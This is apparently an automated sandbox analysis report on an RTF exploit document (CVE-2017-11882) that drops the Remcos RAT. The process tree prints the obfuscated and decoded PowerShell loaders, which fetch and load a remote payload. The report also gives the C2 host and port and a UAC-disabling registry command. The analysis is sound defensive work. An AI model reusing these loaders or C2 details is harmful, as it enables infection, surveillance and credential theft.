Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf

Overview

General Information

Sample name:SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf
Analysis ID:1505518
MD5:124bfb183c9b3f3b757fa9559967ab95
SHA1:e2004e5b5803b0ab65c9b8142808f9367a9b1c8a
SHA256:1a7f73810fe77606fa0b04f8425407e39b2c6ba612cb287d56b7e46506781840
Tags:rtf
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Document exploit detected (process start blacklist hit)
Found Tor onion address
Injects a PE file into a foreign processes
Installs new ROOT certificates
Maps a DLL or memory area into another process
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3568 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3616 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3756 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?TwBm? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwBl? ? ? ? ?C? ? ? ? ?? ? ? ? ?M? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?Kw? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?u? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?FM? ? ? ? ?dQBi? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBD? ? ? ? ?G8? ? ? ? ?bgB2? ? ? ? ?GU? ? ? ? ?cgB0? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?EY? ? ? ? ?cgBv? ? ? ? ?G0? ? ? ? ?QgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GQ? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBS? ? ? ? ?GU? ? ? ? ?ZgBs? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Gk? ? ? ? ?bwBu? ? ? ? ?C4? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?Ew? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BU? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?Cg? ? ? ? ?JwBk? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GI? ? ? ? ?LgBJ? ? ? ? ?E8? ? ? ? ?LgBI? ? ? ? ?G8? ? ? ? ?bQBl? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?bQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B0? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?TQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?FY? ? ? ? ?QQBJ? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgB2? ? ? ? ?G8? ? ? ? ?awBl? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bu? ? ? ? ?HU? ? ? ? ?b? ? ? ? ?Bs? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?G8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Fs? ? ? ? ?XQBd? ? ? ? ?C? ? ? ? ?? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?HQ? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RwBG? ? ? ? ?EY? ? ? ? ?UgBF? ? ? ? ?Fc? ? ? ? ?Lw? ? ? ? ?1? ? ? ? ?DM? ? ? ? ?Lw? ? ? ? ?0? ? ? ? ?Dg? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?DE? ? ? ? ?N? ? ? ? ?? ? ? ? ?y? ? ? ? ?C4? ? ? ? ?OQ? ? ? ? ?z? ? ? ? ?DI? ? ? ? ?Lg? ? ? ? ?1? ? ? ? ?Dg? ? ? ? ?Lw? ? ? ? ?v? ? ? ? ?Do? ? ? ? ?c? ? ? ? ?B0? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?JwBS? ? ? ? ?GU? ? ? ? ?ZwBB? ? ? ? ?HM? ? ? ? ?bQ? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?Jw? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?KQ? ? ? ? ?=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3900 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • RegAsm.exe (PID: 4008 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3184 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\grmnuvnmumxdrrgkqp" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3200 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rtrfuoyfiupqcguozzwaq" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3216 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\towqvgihwchvemqsikjctbjd" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3232 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\towqvgihwchvemqsikjctbjd" MD5: 8FE9545E9F72E460723F484C304314AD)
    • EQNEDT32.EXE (PID: 904 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "dremom2.duckdns.org:2201:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-OT0ZCG", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1b9e:$obj2: \objdata
  • 0x1b88:$obj3: \objupdate
  • 0x1b60:$obj5: \objautlink
SourceRuleDescriptionAuthorStrings
00000008.00000002.875009514.0000000000539000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000008.00000002.875009514.0000000000521000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000008.00000002.875009514.0000000000505000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 23 entries
            SourceRuleDescriptionAuthorStrings
            8.2.RegAsm.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              8.2.RegAsm.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                8.2.RegAsm.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  8.2.RegAsm.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6aab8:$a1: Remcos restarted by watchdog!
                  • 0x6b030:$a3: %02i:%02i:%02i:%03i
                  8.2.RegAsm.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
